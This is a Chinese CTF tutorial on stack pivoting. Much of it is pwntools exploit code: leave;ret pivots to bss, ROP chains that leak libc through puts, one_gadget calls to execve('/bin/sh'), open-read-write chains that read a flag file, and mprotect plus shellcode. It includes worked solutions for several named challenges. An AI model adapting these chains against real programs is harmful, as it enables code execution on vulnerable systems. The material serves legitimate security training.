栈迁移（Stack Pivoting）进阶技术详解<\/h1>

一、栈迁移基础概念<\/h2>
栈迁移（Stack Pivoting）是一种在漏洞利用中常见的技术，用于改变栈的正常行为，特别是在缓冲区溢出等安全漏洞的情况下。其核心在于修改栈指针（如x86架构中的ESP\/RSP寄存器）的值，使其指向攻击者控制的数据区域。<\/p>
关键要点：<\/p>
实际应用中常通过劫持ebp和esp将栈劫持到bss段<\/li>
核心是利用leave, ret<\/code>这段gadget<\/li>
leave<\/code>指令等价于mov esp,ebp; pop ebp;<\/code><\/li>
ret<\/code>指令等价于pop eip<\/code>（弹出栈顶数据给eip寄存器）<\/li>
<\/ul>
二、基本栈迁移利用技术<\/h2>
2.1 基础利用模式<\/h3>
bss6 =<\/span> 0x601000<\/span>+<\/span>0x600<\/span>
<\/span><\/span>pl =<\/span> b<\/span>'a'<\/span>*<\/span>0x20<\/span> +<\/span> p64(bss6) +<\/span> p64(read)  # rbp=bss6 -> rax=bss6+(-0x20)<\/span>
<\/span><\/span>p.<\/span>send(pl)
<\/span><\/span><\/code><\/pre>2.2 栈平衡调整<\/h3>
初始尝试后，read会往后执行走向结束，rsp未被控制，需要调整：<\/p>
pl =<\/span> b<\/span>'a'<\/span>*<\/span>0x20<\/span> +<\/span> p64(bss6+<\/span>0x20<\/span>) +<\/span> p64(read)  # 第二次read，调整rsp<\/span>
<\/span><\/span>p.<\/span>send(pl)
<\/span><\/span><\/code><\/pre>2.3 ROP链构造<\/h3>
rsp调试正常后，可进行ROP链构造：<\/p>
# puts(puts_got)<\/span>
<\/span><\/span>pl =<\/span> p64(bss6+<\/span>0x20<\/span>+<\/span>0x10<\/span>) +<\/span> p64(rdi) +<\/span> p64(puts_got) +<\/span> p64(puts_plt) +<\/span> p64(main)
<\/span><\/span><\/code><\/pre>注意：<\/p>

bss6+0x20<\/code>基础上再加0x10<\/code>（固定模板）<\/li>
后续可能需要再次调整：pl = b'a'*0x20 + p64(bss6+0x40) + p64(read)<\/code><\/li>
<\/ul>
三、高级利用技巧<\/h2>
3.1 one_gadget利用<\/h3>
r12 =<\/span> 0x000000000002f709<\/span> +<\/span> libc_base
<\/span><\/span>og =<\/span> libc_base +<\/span> 0xe3afe<\/span>
<\/span><\/span>pl =<\/span> p64(0<\/span>) +<\/span> p64(r12) +<\/span> p64(0<\/span>) +<\/span> p64(og)
<\/span><\/span>p.<\/span>send(pl)
<\/span><\/span><\/code><\/pre>one_gadget约束条件：<\/p>
0xe3afe execve("\/bin\/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b01 execve("\/bin\/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b04 execve("\/bin\/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
<\/code><\/pre>
3.2 沙盒绕过技术<\/h3>
当存在沙盒限制时，需要使用ORW（Open-Read-Write）技术：<\/p>
# 获取libc地址后构造ORW链<\/span>
<\/span><\/span>pl =<\/span> p64(bss+<\/span>0x130<\/span>) +<\/span> p64(rdi) +<\/span> p64(0<\/span>) +<\/span> p64(rsi_r15) +<\/span> p64(0x601200<\/span>) +<\/span> p64(0x40<\/span>) +<\/span> p64(read_addr) +<\/span> p64(main)
<\/span><\/span>p.<\/span>send(pl)
<\/span><\/span>pause()
<\/span><\/span>p.<\/span>send('flag'<\/span>)  # 发送文件名<\/span>
<\/span><\/span>
<\/span><\/span># 后续构造syscall链<\/span>
<\/span><\/span>syscall =<\/span> libc_base +<\/span> libc.<\/span>sym['syscall'<\/span>]
<\/span><\/span>pl =<\/span> p64(0<\/span>) +<\/span> p64(rdi) +<\/span> p64(2<\/span>) +<\/span> p64(rsi_r15) +<\/span> p64(0x601200<\/span>) +<\/span> p64(0<\/span>) +<\/span> p64(syscall)
<\/span><\/span>pl +=<\/span> p64(rdi) +<\/span> p64(3<\/span>) +<\/span> p64(rsi_r15) +<\/span> p64(0x601200<\/span>) +<\/span> p64(0x100<\/span>) +<\/span> p64(read_addr)
<\/span><\/span>pl +=<\/span> p64(rdi) +<\/span> p64(0x601200<\/span>) +<\/span> p64(puts_addr) +<\/span> p64(main)
<\/span><\/span>p.<\/span>send(pl)
<\/span><\/span><\/code><\/pre>3.3 文件描述符说明<\/h3>

0：标准输入<\/li>
1：标准输出<\/li>
2：标准错误<\/li>
3,4,5...：第一、二、三...个打开的文件<\/li>
<\/ul>
四、实战案例解析<\/h2>
4.1 move_your_heart题目利用<\/h3>
sla('num:<\/span>\n<\/span>'<\/span>, '286129175'<\/span>)
<\/span><\/span>ru('gift:'<\/span>)
<\/span><\/span>stack =<\/span> int(p.<\/span>recv(14<\/span>),16<\/span>)  # 获取栈地址<\/span>
<\/span><\/span>
<\/span><\/span># 直接栈迁移到可控区域<\/span>
<\/span><\/span>pl =<\/span> p64(rdi) +<\/span> p64(stack+<\/span>0x18<\/span>) +<\/span> p64(system) +<\/span> b<\/span>'\/bin\/sh<\/span>\x00<\/span>'<\/span> +<\/span> p64(stack-<\/span>0x8<\/span>) +<\/span> p64(leave_ret)
<\/span><\/span>p.<\/span>sendline(pl)
<\/span><\/span><\/code><\/pre>4.2 VN2023-Traveler题目（限制0x10大小）<\/h3>
# 两次leave_ret调整栈<\/span>
<\/span><\/span>pl =<\/span> b<\/span>'a'<\/span>*<\/span>0x20<\/span> +<\/span> p64(stack) +<\/span> p64(read)  #1<\/span>
<\/span><\/span>pl =<\/span> b<\/span>'a'<\/span>*<\/span>0x20<\/span> +<\/span> p64(stack+<\/span>0x20<\/span>) +<\/span> p64(read)  #2<\/span>
<\/span><\/span>
<\/span><\/span># 泄露libc<\/span>
<\/span><\/span>pl =<\/span> p64(stack+<\/span>0x20<\/span>+<\/span>0x10<\/span>) +<\/span> p64(rdi) +<\/span> p64(puts_got) +<\/span> p64(puts_plt) +<\/span> p64(main)
<\/span><\/span>
<\/span><\/span># 获取新栈地址后再次调整<\/span>
<\/span><\/span>pl =<\/span> b<\/span>'a'<\/span>*<\/span>0x20<\/span> +<\/span> p64(stack0) +<\/span> p64(read)  #4<\/span>
<\/span><\/span>pl =<\/span> b<\/span>'a'<\/span>*<\/span>0x20<\/span> +<\/span> p64(stack0+<\/span>0x20<\/span>) +<\/span> p64(read)  #5<\/span>
<\/span><\/span>
<\/span><\/span># 最终one_gadget利用<\/span>
<\/span><\/span>pl =<\/span> p64(0<\/span>) +<\/span> p64(r12) +<\/span> p64(0<\/span>) +<\/span> p64(og)
<\/span><\/span><\/code><\/pre>4.3 西湖论剑-Message Board题目<\/h3>
# 格式字符串泄露栈地址<\/span>
<\/span><\/span>ru('name:<\/span>\n<\/span>'<\/span>)
<\/span><\/span>sl('%28$p'<\/span>)
<\/span><\/span>stack_addr =<\/span> int(p.<\/span>recv(14<\/span>),16<\/span>)-<\/span>0x1a0<\/span>
<\/span><\/span>
<\/span><\/span># 两次leave_ret矫正rsp<\/span>
<\/span><\/span>payload =<\/span> p64(stack_addr+<\/span>0xb0<\/span>+<\/span>0x28<\/span>) 
<\/span><\/span>payload +=<\/span> p64(pop_rdi) +<\/span> p64(elf.<\/span>got["puts"<\/span>]) +<\/span> p64(elf.<\/span>plt["puts"<\/span>]) +<\/span> p64(0x401378<\/span>)
<\/span><\/span>payload =<\/span> payload.<\/span>ljust(0xb0<\/span>,b<\/span>'<\/span>\0<\/span>'<\/span>)
<\/span><\/span>payload +=<\/span> p64(stack_addr) +<\/span> p64(0x4012e0<\/span>)
<\/span><\/span>
<\/span><\/span># ORW构造<\/span>
<\/span><\/span>orw =<\/span> p64(pop_rdi) +<\/span> p64(stack_addr+<\/span>0xd0<\/span>) +<\/span> p64(pop_rsi) +<\/span> p64(0<\/span>) +<\/span> p64(open_addr)
<\/span><\/span>orw +=<\/span> p64(pop_rdi) +<\/span> p64(3<\/span>) +<\/span> p64(pop_rsi) +<\/span> p64(elf.<\/span>bss()+<\/span>0x800<\/span>) +<\/span> p64(pop_rdx) +<\/span> p64(0x50<\/span>) +<\/span> p64(elf.<\/span>plt["read"<\/span>])
<\/span><\/span>orw +=<\/span> p64(pop_rdi) +<\/span> p64(elf.<\/span>bss()+<\/span>0x800<\/span>) +<\/span> p64(elf.<\/span>plt["puts"<\/span>])
<\/span><\/span>orw =<\/span> orw.<\/span>ljust(0xa8<\/span>,b<\/span>'<\/span>\0<\/span>'<\/span>) +<\/span> b<\/span>'.\/flag<\/span>\x00\x00<\/span>'<\/span>
<\/span><\/span>orw +=<\/span> p64(stack_addr+<\/span>0x28<\/span>-<\/span>8<\/span>) +<\/span> p64(0x4012e0<\/span>)
<\/span><\/span><\/code><\/pre>4.4 mprotect+shellcode技术<\/h3>
mp =<\/span> p64(pop_rdi) +<\/span> p64(bss) +<\/span> p64(pop_rsi) +<\/span> p64(0x1000<\/span>) +<\/span> p64(pop_rdx) +<\/span> p64(7<\/span>) +<\/span> p64(mproetct)
<\/span><\/span>mp +=<\/span> p64(pop_rdi) +<\/span> p64(0<\/span>) +<\/span> p64(pop_rsi) +<\/span> p64(bss+<\/span>0x600<\/span>) +<\/span> p64(pop_rdx) +<\/span> p64(0x300<\/span>) +<\/span> p64(elf.<\/span>plt["read"<\/span>])
<\/span><\/span>mp +=<\/span> p64(bss+<\/span>0x600<\/span>)
<\/span><\/span>mp =<\/span> mp.<\/span>ljust(0xb0<\/span>,b<\/span>'<\/span>\0<\/span>'<\/span>)
<\/span><\/span>mp +=<\/span> p64(stack_addr+<\/span>0x28<\/span>-<\/span>8<\/span>) +<\/span> p64(0x4012e0<\/span>)
<\/span><\/span>p.<\/span>send(mp)
<\/span><\/span>
<\/span><\/span># 发送shellcode<\/span>
<\/span><\/span>sc =<\/span> asm(shellcraft.<\/span>cat(b<\/span>".\/flag"<\/span>))
<\/span><\/span>p.<\/span>send(sc)
<\/span><\/span><\/code><\/pre>五、关键调试技巧<\/h2>

使用gdb附加调试：<\/li>
<\/ol>
def<\/span> dbg<\/span>():
<\/span><\/span>   gdb.<\/span>attach(proc.<\/span>pidof(p)[0<\/span>])
<\/span><\/span>   pause()
<\/span><\/span><\/code><\/pre>
常用gadget收集：<\/li>
<\/ol>

pop rdi; ret;<\/code><\/li>
pop rsi; pop r15; ret;<\/code><\/li>
pop rdx; ret;<\/code><\/li>
leave; ret;<\/code><\/li>
<\/ul>

地址泄露技巧：<\/li>
<\/ol>

使用puts泄露got表地址<\/li>
格式字符串泄露栈地址<\/li>
<\/ul>
六、总结<\/h2>
栈迁移技术要点：<\/p>

理解leave; ret<\/code>指令的作用<\/li>
掌握栈平衡调整方法<\/li>
熟练使用ROP链构造<\/li>
根据题目限制选择合适的利用方式（one_gadget\/ORW\/shellcode等）<\/li>
注意文件描述符的使用和传递<\/li>
<\/ol>
通过反复练习不同场景下的栈迁移利用，可以逐步掌握这一高级漏洞利用技术。实际应用中需要根据题目具体环境和保护机制灵活调整利用策略。<\/p>